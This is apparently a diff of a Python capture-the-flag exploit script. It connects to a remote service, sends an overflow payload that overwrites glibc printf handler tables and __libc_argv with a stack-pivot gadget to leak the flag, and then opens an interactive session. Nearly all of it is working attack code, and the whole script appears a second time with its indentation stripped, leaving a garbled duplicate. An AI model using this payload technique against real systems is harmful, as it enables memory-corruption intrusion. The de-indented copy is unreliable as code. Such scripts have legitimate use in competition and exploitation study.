hhc0null · December 29, 2017 20:58
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/env python

 from pathlib import PurePath, Path
 from tempfile import NamedTemporaryFile
 from itertools import islice, cycle
 from hexdump import hexdump as hd
 import binascii
 import hashlib
 import re
 import os
 import shlex
 import socket
 import string
 import struct
 import subprocess
 import sys
 import time
 import telnetlib

 from random import choice
 from string import ascii_letters, digits


 # Utilities
 def p(x, length=1, byteorder='little', signed=False):
    return int.to_bytes(x, length, byteorder, signed=signed)

 def p64(x):
    return p(x, length=8)

 def p32(x):
    return p(x, length=4)

 def u(x, byteorder='little', signed=False):
    return int.from_bytes(x, byteorder, signed=signed)

 # Additional
 def pad(data, length):
    return bytes(islice(cycle(data), length))

 '''
 def a2n(s):
    return socket.inet_aton(s)

 def n2a(s):
    return socket.inet_ntoa(s)
 '''

 def nasm(code, bits=64):
    asmcode = ("BITS {:d}\n{:s}".format(bits, code))

    source = NamedTemporaryFile(prefix='shellcode-', suffix='.s', delete=False)
    srcpath = source.name
    source.write(asmcode.encode())
    source.close()

    cmd = 'nasm {:s}'.format(str(source.name))
    r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)

    o = Path(PurePath(source.name).with_suffix(''))
    shellcode = o.read_bytes()

    return shellcode

 def _dp(data):
    global _debug
    if not _debug:
        return False
    print('[DEBUG] - raw\n', data, file=sys.stderr) 
    return True

 # Communicators

 def read_until(f, delim='\n'):
    data = ""
    while not data.endswith(delim):
        data += f.read(1)
    return data

 def connect(rhp):
    s = socket.create_connection(rhp)
    f = s.makefile('rw')
    print('[+] Connected to {:s}:{:d}'.format(*rhp))
    return s, f

 def interact(s):
    t = telnetlib.Telnet()
    t.sock = s

    print('[+] Entering to interactive mode...') 
    t.interact()

 ### user-defined
 class IO(object):
    def __init__(self, rhp):
        self.rhp = rhp
        self.s, self.f = connect(self.rhp)

    def _read(self, size):
        return self.s.recv(size)

    def _write(self, buf):
        self.s.send(buf)

    def read(self, size=1):
        return self._read(size)

    def write(self, buf, end=b''):
        self._write(buf+end)

    def writeln(self, buf):
        self.write(buf, end=b'\n')

    def read_until(self, delim=b'\n'):
        buf = b''
        while not buf.endswith(delim):
            buf += self._read(1)
        return buf

    def flush(self):
        self.f.flush()

    def interact(self):
        interact(self.s)

    def close(self):
        self.f.close()
        self.s.close()

 class RRIO(IO):
    def __init__(self, rhp, debug=False):
        self.debug = debug
        super(RRIO, self).__init__(rhp)

        #data = self.read_until()
        #_dp(data)

 class Pwn(object):
    def attack(self, ip, port, local=False):
        main(ip, port, local)

 def main(ip, port, local):
    if local:
        pass

    addr_name = 0x00000000006b73e0
    data = b''.join((
        #    1765: 00000000006b7980     8 OBJECT  GLOBAL DEFAULT   24 __libc_argv
        b'_'*(0x00000000006b7980-addr_name), # padding
        p64(0x00000000006b7ab8),
        b'_'*(0x00000000006b7a28-0x00000000006b7988), # padding
        p64(0x00000000006b7ab0-0x73*8), #    1509: 00000000006b7a28     8 OBJECT  GLOBAL DEFAULT   24 __printf_function_table
        p64(addr_name+0x800), #     846: 00000000006b7a30     8 OBJECT  GLOBAL DEFAULT   24 __printf_modifier_table
        b'_'*(0x00000000006b7aa8-0x00000000006b7a38), # padding
        p64(addr_name+0x800-0x73*8), #   1335: 00000000006b7aa8     8 OBJECT  GLOBAL DEFAULT   25 __printf_arginfo_table
        p64(0x40164e), # 0x00434162: pop rsp ; jmp rax ; #    1808: 00000000006b7ab0     8 OBJECT  GLOBAL DEFAULT   25 __printf_va_arg_table
        p64(0x6b4040),
    ))
    rrio = RRIO((ip, port,))
    rrio.writeln(data)
    out = rrio.read_until()
    the_flag = re.search(r"Error in \`([^']+)'", out.decode()).groups(1)[0]
    print('[+] The flag is: '+the_flag)
    rrio.interact()

 if __name__ == '__main__':
    _debug = False

    try:
        import fire
        fire.Fire(Pwn)
    except:
        main(sys.argv[1], int(sys.argv[2]), len(sys.argv) > 3)

 '''
 '''
	#!/usr/bin/env python

	from pathlib import PurePath, Path
	from tempfile import NamedTemporaryFile
	from itertools import islice, cycle
	from hexdump import hexdump as hd
	import binascii
	import hashlib
	import re
	import os
	import shlex
	import socket
	import string
	import struct
	import subprocess
	import sys
	import time
	import telnetlib

	from random import choice
	from string import ascii_letters, digits


	# Utilities
	def p(x, length=1, byteorder='little', signed=False):
	return int.to_bytes(x, length, byteorder, signed=signed)

	def p64(x):
	return p(x, length=8)

	def p32(x):
	return p(x, length=4)

	def u(x, byteorder='little', signed=False):
	return int.from_bytes(x, byteorder, signed=signed)

	# Additional
	def pad(data, length):
	return bytes(islice(cycle(data), length))

	'''
	def a2n(s):
	return socket.inet_aton(s)

	def n2a(s):
	return socket.inet_ntoa(s)
	'''

	def nasm(code, bits=64):
	asmcode = ("BITS {:d}\n{:s}".format(bits, code))

	source = NamedTemporaryFile(prefix='shellcode-', suffix='.s', delete=False)
	srcpath = source.name
	source.write(asmcode.encode())
	source.close()

	cmd = 'nasm {:s}'.format(str(source.name))
	r = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)

	o = Path(PurePath(source.name).with_suffix(''))
	shellcode = o.read_bytes()

	return shellcode

	def _dp(data):
	global _debug
	if not _debug:
	return False
	print('[DEBUG] - raw\n', data, file=sys.stderr)
	return True

	# Communicators

	def read_until(f, delim='\n'):
	data = ""
	while not data.endswith(delim):
	data += f.read(1)
	return data

	def connect(rhp):
	s = socket.create_connection(rhp)
	f = s.makefile('rw')
	print('[+] Connected to {:s}:{:d}'.format(*rhp))
	return s, f

	def interact(s):
	t = telnetlib.Telnet()
	t.sock = s

	print('[+] Entering to interactive mode...')
	t.interact()

	### user-defined
	class IO(object):
	def __init__(self, rhp):
	self.rhp = rhp
	self.s, self.f = connect(self.rhp)

	def _read(self, size):
	return self.s.recv(size)

	def _write(self, buf):
	self.s.send(buf)

	def read(self, size=1):
	return self._read(size)

	def write(self, buf, end=b''):
	self._write(buf+end)

	def writeln(self, buf):
	self.write(buf, end=b'\n')

	def read_until(self, delim=b'\n'):
	buf = b''
	while not buf.endswith(delim):
	buf += self._read(1)
	return buf

	def flush(self):
	self.f.flush()

	def interact(self):
	interact(self.s)

	def close(self):
	self.f.close()
	self.s.close()

	class RRIO(IO):
	def __init__(self, rhp, debug=False):
	self.debug = debug
	super(RRIO, self).__init__(rhp)

	#data = self.read_until()
	#_dp(data)

	class Pwn(object):
	def attack(self, ip, port, local=False):
	main(ip, port, local)

	def main(ip, port, local):
	if local:
	pass

	addr_name = 0x00000000006b73e0
	data = b''.join((
	# 1765: 00000000006b7980 8 OBJECT GLOBAL DEFAULT 24 __libc_argv
	b'_'*(0x00000000006b7980-addr_name), # padding
	p64(0x00000000006b7ab8),
	b'_'*(0x00000000006b7a28-0x00000000006b7988), # padding
	p64(0x00000000006b7ab0-0x73*8), # 1509: 00000000006b7a28 8 OBJECT GLOBAL DEFAULT 24 __printf_function_table
	p64(addr_name+0x800), # 846: 00000000006b7a30 8 OBJECT GLOBAL DEFAULT 24 __printf_modifier_table
	b'_'*(0x00000000006b7aa8-0x00000000006b7a38), # padding
	p64(addr_name+0x800-0x73*8), # 1335: 00000000006b7aa8 8 OBJECT GLOBAL DEFAULT 25 __printf_arginfo_table
	p64(0x40164e), # 0x00434162: pop rsp ; jmp rax ; # 1808: 00000000006b7ab0 8 OBJECT GLOBAL DEFAULT 25 __printf_va_arg_table
	p64(0x6b4040),
	))
	rrio = RRIO((ip, port,))
	rrio.writeln(data)
	out = rrio.read_until()
	the_flag = re.search(r"Error in \`([^']+)'", out.decode()).groups(1)[0]
	print('[+] The flag is: '+the_flag)
	rrio.interact()

	if __name__ == '__main__':
	_debug = False

	try:
	import fire
	fire.Fire(Pwn)
	except:
	main(sys.argv[1], int(sys.argv[2]), len(sys.argv) > 3)

	'''
	'''